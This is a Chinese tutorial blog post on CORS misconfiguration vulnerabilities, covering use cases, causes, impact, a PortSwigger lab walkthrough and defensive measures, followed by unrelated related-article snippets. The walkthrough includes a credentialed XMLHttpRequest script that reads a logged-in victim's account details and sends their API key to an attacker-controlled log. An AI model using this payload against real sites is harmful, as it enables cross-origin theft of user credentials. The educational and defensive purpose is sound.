常见的Web漏洞——CORS

渗透做了多年的朋友都知道,大洞小洞都是漏洞。因此也学习、沉淀一下以前没重视的漏洞。

简介

CORSCross-Origin Resource Sharing跨源资源共享)是一种由Web浏览器实现的安全策略,用于控制一个Web页面(服务端)是否能够访问来自不同源(域名、协议或端口)的资源。这是为了防止恶意网站通过 AJAX 请求访问另一个网站的敏感数据。

CORS漏洞是指服务器在处理跨源HTTP请求时未能正确实施安全策略,导致敏感数据或功能被未经授权的第三方访问。这种漏洞通常发生在Web应用中,它允许攻击者绕过浏览器的同源策略,从而访问或操作另一个域的资源。

跨域访问的一些场景:

  1. 单页面应用(SPA)与后端API
    场景:现代Web应用经常采用单页面应用架构,前端JavaScript框架(如React、Angular、Vue.js)与后端API(可能部署在不同的域名上)需要进行通信。
    CORS作用:允许前端应用从浏览器安全地发起跨域请求到后端API,并接收响应。
  2. 第三方服务集成
    场景:Web应用可能需要集成第三方服务(如地图服务、社交媒体登录、支付网关等)。
    CORS作用:确保第三方服务的API可以安全地从Web应用的域被访问。
  3. 内容分发网络(CDN)
    场景:为了提高加载速度和全球访问性,静态资源(如JavaScript库、CSS文件、图片等)可能被部署在CDN上。
    CORS作用:允许Web应用从CDN跨域加载静态资源。
  4. Web组件和Web部件
    场景:开发者可能在不同的域上创建和使用可重用的Web组件。
    CORS作用:确保这些组件可以跨域访问和集成。
  5. 跨域字体加载
    场景:Web设计师可能需要从不同的源加载自定义字体。
    CORS作用:允许浏览器跨域加载字体文件,如Google Fonts。
  6. 跨域图像和媒体
    场景:Web应用可能需要展示存储在其他域上的图像、视频或其他媒体内容。
    CORS作用:允许这些媒体资源被安全地跨域访问和展示。
  7. 开放API和微服务架构
    场景:在微服务架构中,不同的服务组件可能部署在不同的域上,需要相互通信。
    CORS作用:在这种分布式系统中,CORS确保服务间的安全通信。
  8. 前后端分离开发
    场景:在前后端分离的开发模式中,前端和后端可能由不同的团队独立开发和部署。
    CORS作用:允许前端应用跨域请求后端服务,实现前后端的协同工作。
  9. 跨域测试和调试
    场景:开发者在开发和测试阶段可能需要从不同的源访问API或资源。
    CORS作用:简化开发和测试过程,允许从不同的源发起请求。
  10. 跨域Webhooks
    场景:服务间可能使用Webhooks进行实时通信,一个服务需要向另一个服务的端点发送请求。
    CORS作用:确保Webhooks可以跨域触发和接收。

CORS漏洞的成因

CORS是一种策略,因此产生漏洞的原因是配置不当。即服务器允许任何网站都能访问资源:Access-Control-Allow-Origin: *

CORS漏洞的影响

  • 数据泄露:攻击者可能访问到其他域的敏感数据。
  • 数据篡改:攻击者可能修改或破坏其他域的数据。
  • 跨站请求伪造(CSRF):CORS漏洞可能被用来绕过某些CSRF保护措施。
  • 点击劫持:攻击者可能利用CORS漏洞来实施点击劫持攻击。

漏洞检测

使用Burp提供的lab检测,登录之后访问/accountDetails,添加Origin: https://test,返回如图:
在这里插入图片描述
没有对来源进行校验,因此存在漏洞,利用Burp提供的exploit-server(和公网服务器作用相同)编写钓鱼代码(主要看思路):

<script>
// 创建一个新的XMLHttpRequest对象
var req = new XMLHttpRequest();
// 定义请求成功完成时的事件处理函数
req.onload = reqListener;
// 异步GET请求获取API
req.open('GET', 'https://0a760050042874d381bf996c00660044.web-security-academy.net/accountDetails', true);
// 设置withCredentials属性为true,允许请求携带cookies
req.withCredentials = true;
req.send()
function reqListener(){// 将获取的响应数据提交到/alocation = '/a?key='+ this.responseText;
}
</script>

点击Store模拟生成调与链接,点击Deliver exploit to victim模拟用户访问钓鱼链接:
在这里插入图片描述
点击Access log查看访问日志可以获取受害者API凭据:
在这里插入图片描述
解码之后如图:
在这里插入图片描述
现在基本清楚漏洞原理、检测和利用方法了,其它lab无非就是对策略不严格的一些绕过,感兴趣可查看参考资料。

防御措施

  • 限制Access-Control-Allow-Origin:不要使用通配符*,而是明确指定允许访问的源。
  • 正确处理凭证:如果需要支持凭证,确保Access-Control-Allow-Credentials设置为true,并且Access-Control-Allow-Origin不使用通配符。
  • 限制HTTP方法和头信息:仅允许必要的HTTP方法和自定义头信息。
  • 正确响应预检请求:确保服务器正确处理OPTIONS请求,并返回正确的CORS头信息。
  • 使用安全的Cookie属性:为Cookies设置Secure、HttpOnly和SameSite属性。
  • 监控和日志记录:监控CORS相关的服务器配置和日志,以便发现和响应潜在的CORS漏洞。
  • 定期安全审计:定期进行代码审查和安全审计,以识别和修复CORS漏洞。

参考资料

PostSwigger CORS
利用 CORS 错误配置获取比特币和赏金
burp靶场–跨域资源共享(CORS)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/341460.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Unity DOTS技术(五)Archetype,Chunk,NativeArray

文章目录 一.Chunk和Archetype什么是Chunk?什么是ArchType 二.Archetype创建1.创建实体2.创建并添加组件3.批量创建 三.多线程数组NativeArray 本次介绍的内容如下: 一.Chunk和Archetype 什么是Chunk? Chunk是一个空间,ECS系统会将相同类型的实体放在Chunk中.当一个Chunk…

机器学习18个核心算法模型

1. 线性回归&#xff08;Linear Regression&#xff09; 用于建立自变量&#xff08;特征&#xff09;和因变量&#xff08;目标&#xff09;之间的线性关系。 核心公式&#xff1a; 简单线性回归的公式为&#xff1a; , 其中 是预测值&#xff0c; 是截距&#xff0c; 是斜…

leetcode第867题:转置矩阵

matrix[i][j]需要放在转置矩阵的(j,i)位置 public class Solution {public int[][] Transpose(int[][] matrix) {int rows matrix.Length; int columns matrix[0].Length; int[][] array2 new int[columns][];// 初始化内部数组&#xff08;列数&#xff09;for (int i 0…

MySQL数据库常见工具的基础使用_1

在上一篇文章中提到了对MySQL数据库进行操作的一些常见工具 mysqlcheck mysqlcheck是一个用于数据库表的检查&#xff0c;修复&#xff0c;分析和优化的一个客户端程序 分析的作用是查看表的关键字分布,能够让sql生成正确的执行计划(支持InnoDB,MyISAM,NDB)检查的作用是检查…

Linux系统编程(七)网络编程TCP、UDP

本文目录 一、基础知识点1. IP地址2. 端口3. 域名4. 网络协议类型5. IP协议类型6. 字节序7. socket套接字 二、TCP 常用API1. socket套接字描述符2. bind套接字绑定3. listen设置最大排队数4. accept接收客户端请求5. connect连接服务端6. read读取数据7. write发送数据 三、UD…

240.搜索二维矩阵

题目描述 编写一个高效的算法来搜索 m x n 矩阵 matrix 中的一个目标值 target 。该矩阵具有以下特性&#xff1a; 每行的元素从左到右升序排列。每列的元素从上到下升序排列。 示例 1&#xff1a; 输入&#xff1a;matrix [[1,4,7,11,15],[2,5,8,12,19],[3,6,9,16,22],[10,…

【AI大模型】基于Langchain和Openai借口实现英文翻译中文应用

&#x1f680; 作者 &#xff1a;“大数据小禅” &#x1f680; 文章简介 &#xff1a;本专栏后续将持续更新大模型相关文章&#xff0c;从开发到微调到应用&#xff0c;需要下载好的模型包可私。 &#x1f680; 欢迎小伙伴们 点赞&#x1f44d;、收藏⭐、留言&#x1f4ac; 目…

CSPM.pdf

PDF转图片 归档&#xff1a;

C盘清理攻略!!!详细步骤

c盘爆满怎么清&#xff0c;往下看 一、清缓存文件键盘winr打开运行窗口&#xff0c;输入&#xff1a;%temp% 二、清理安装包文件键盘winr打开运行窗口&#xff0c;输入&#xff1a;softwaredistribution 三、清理软件解压临时文件键盘winr打开运行窗口&#xff0c;输入&#xf…

【C语言】结构体(及位段)

你好&#xff01;感谢支持孔乙己的新作&#xff0c;本文就结构体与大家分析我的思路。 希望能大佬们多多纠正及支持 &#xff01;&#xff01;&#xff01; 个人主页&#xff1a;爱摸鱼的孔乙己-CSDN博客 欢迎 互粉哦&#x1f648;&#x1f648;&#xff01; 目录 1. 声明结构…

SQL注入-时间盲注

SQL时间盲注&#xff08;Time-based Blind SQL Injection&#xff09;&#xff0c;又叫延时注入&#xff0c;是一种SQL注入攻击技术&#xff0c;用于在无法直接获取查询结果或查看响应内容变化的情况下&#xff0c;通过引入时间延迟来推断数据库的信息&#xff1b;时间盲注依赖…

tinyrenderer-切线空间法线贴图

法线贴图 法线贴图分两种&#xff0c;一种是模型空间中的&#xff0c;一种是切线空间中的 模型空间中的法线贴图的rgb代表着每个渲染像素法线的xyz&#xff0c;与顶点坐标处于一个空间&#xff0c;图片是五颜六色的。 切线空间中的法线贴图的rgb同样对应xyz&#xff0c;是切线…

可视化数据科学平台在信贷领域应用系列四:决策树策略挖掘

信贷行业的风控策略挖掘是一个综合过程&#xff0c;需要综合考虑风控规则分析结果、效果评估、线上实时监测和业务管理需求等多个方面&#xff0c;以发现和制定有效的信贷风险管理策略。这些策略可能涉及贷款审批标准的调整、贷款利率的制定、贷款额度的设定等&#xff0c;在贷…

低代码开发平台一般都有哪些功能和模块?

在当今快速变化的数字化时代&#xff0c;企业对于高效、灵活且经济的软件开发解决方案的需求愈发迫切。低代码开发平台应运而生&#xff0c;成为众多企业实现数字化转型的首选工具。本文将详细探讨低代码开发平台一般具备的主要功能和模块&#xff0c;以及它们如何助力企业提升…

Dinky MySQLCDC 整库同步到 Doris

资源&#xff1a;flink 1.17.0、dinky 1.0.2、doris-2.0.1-rc04 问题&#xff1a;Cannot deserialize value of type int from String &#xff0c;detailMessageunknowndatabases &#xff0c;not a valid int value 2024-05-29 16:52:20.136 ERROR org.apache.doris.flink.…

AI论文工具推荐

AI 在学术界的使用情况也比较疯狂&#xff0c;特别是一些美国大学&#xff0c;用 AI 来辅助阅读文献以及辅助写论文的越来越多&#xff0c;毕竟确实可以提高写作效率&#xff0c;特别是在文献综述和初稿生成方面。 但在科研界其实&#xff0c;发现看论文的速度已经赶不上发论文…

领夹麦克风什么牌子好?2024无线领夹麦克风十大品牌排行榜推荐

​如今&#xff0c;无线麦克风已逐渐渗透到我们日常生活的各个角落&#xff0c;无论是专业的自媒体创作者、带货主播&#xff0c;还是日常拍摄记录生活的我们&#xff0c;都可能用到它。在挑选无线麦克风时&#xff0c;收音降噪效果和性价比无疑是两大核心考量因素。为此&#…

【wiki知识库】05.分类管理实现--前端Vue模块

&#x1f4dd;个人主页&#xff1a;哈__ 期待您的关注 目录 一、&#x1f525;今日目标 二、&#x1f30f;前端部分的改造 2.1 新增一个tool.ts 2.2 新增admin-categoty.vue 2.3 添加新的路由规则 2.4 添加the-welcome.vue 2.5 修改HomeView.vue 三、❗注意 一、&…

The authenticity of host ‘github.com (20.205.243.166)‘ can‘t be established.

目录 github初始化仓库&#xff0c;无法链接 解决无法与主机github.com(20.205.243.166)建立真实性 # 问题原因 # 生成密钥 # 物理路径 # 建立交互 # 验证 github初始化仓库&#xff0c;无法链接 在github创建一个新的仓库时&#xff0c;如果我们未初始化&#xff0c;…

面试题vue+uniapp(个人理解-面试口头答述)未编辑完整....

1.vue2和vue3的区别&#xff08;vue3与vue2的区别&#xff08;你不知道细节全在这&#xff09;_vue2和vue3区别-CSDN博客&#xff09;参考 Vue3 在组合式&#xff08;Composition &#xff09;API&#xff0c;中使用生命周期钩子时需要先引入&#xff0c;而 Vue2 在选项API&am…